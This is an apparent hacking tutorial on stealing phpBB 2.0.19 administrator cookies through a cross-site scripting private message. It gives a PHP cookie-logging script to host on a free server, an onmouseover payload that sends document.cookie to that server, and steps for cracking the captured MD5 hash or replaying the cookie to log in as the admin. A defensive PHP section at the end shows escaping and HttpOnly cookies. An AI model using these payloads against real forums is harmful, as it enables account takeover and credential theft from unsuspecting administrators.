Hacking phpBB 2.0.19 or lower by stealing cookies

Thursday, February 11, 2010 by BBTUNA
Tools needed:
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/)
A Free Server with PHP (http://www.t35.com)

1 - Make a file with notepad
Insert this code into it:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777 lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Save it as lol.php and upload it to your free server at t35.com.

2 - Now find a forum that you want to hack (if you see that html is off by default like in this picture forget it)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)

3 - This is the code you have to pm the admin
' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='

http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg

Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.

When the admin puts his mouse over this code it will redirect him to your php file and it will show him a blank screen; you can modify that so it doesn't look so suspicious.

4 - Now find the admin or whoever you want to hack, pm him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.

5 - Once he clicks the message it will make a file in your server called ****.txt, open it.
You will see some code that looks like this:
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991

A - The easiest way is to copy the password hash which in this case is
3921c75b299268bd87f48ec8c289c3f0
Copy that hash, go to md5.rednoize.com or any other cracker and paste it there. If nothing shows up, you will have to use HTTP headers (in example B) to log in as the admin.

B - Go to the forum you hacked, click on tools -> live http headers (assuming you have firefox and http headers installed)

Now refresh the page, at the top of the http headers screen you will see something like this:
http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)

Click on Replay

Delete all the code that comes after
cookie:

Replace it with the code from step 5 that you received from your server's log.
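
The string in step 3 only works when message text reaches a quoted HTML attribute with its quote unescaped, and the cookie in step 5 is only readable because page script can see it through document.cookie. The following is an added example, not code from the original post or from phpBB: it shows the unescaped rendering beside a hardened one, plus a session cookie that script cannot read. The helpers render_img_vulnerable, render_img_hardened and issue_session_cookie and the cookie name forum_sid are hypothetical, and the options-array form of setcookie assumes PHP 7.3 or later.

```php
<?php
// Added defensive example. Helper names and the cookie name are hypothetical.

// Session cookie holds only a random opaque id (no user id, no password hash),
// is hidden from document.cookie (httponly) and is sent over HTTPS only.
function issue_session_cookie(): string
{
    $sid = bin2hex(random_bytes(16));
    setcookie('forum_sid', $sid, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    return $sid;
}

// Vulnerable: user text is placed inside a single-quoted attribute unescaped,
// so a value containing ' closes the attribute and adds an event handler.
function render_img_vulnerable(string $url): string
{
    return "<img src='" . $url . "'>";
}

// Hardened: accept only http(s) URLs and escape both quote styles.
function render_img_hardened(string $url): ?string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null; // reject javascript:, data: and malformed values
    }
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<img src='" . $safe . "'>";
}

// Cookies must be set before any output is sent.
issue_session_cookie();

// Constructed sample input with the same shape as the step 3 string.
$input = "http://example.com/a.jpg' onmouseover='/* handler */' b='";

echo render_img_vulnerable($input), PHP_EOL; // attribute is broken open
echo render_img_hardened($input), PHP_EOL;   // quotes become &#039;
```

With the hardened renderer the whole input stays inside the src value, so no onmouseover attribute is created. The cookie shown in step 5 would also not be replayable as a password, because the session id carries no hash.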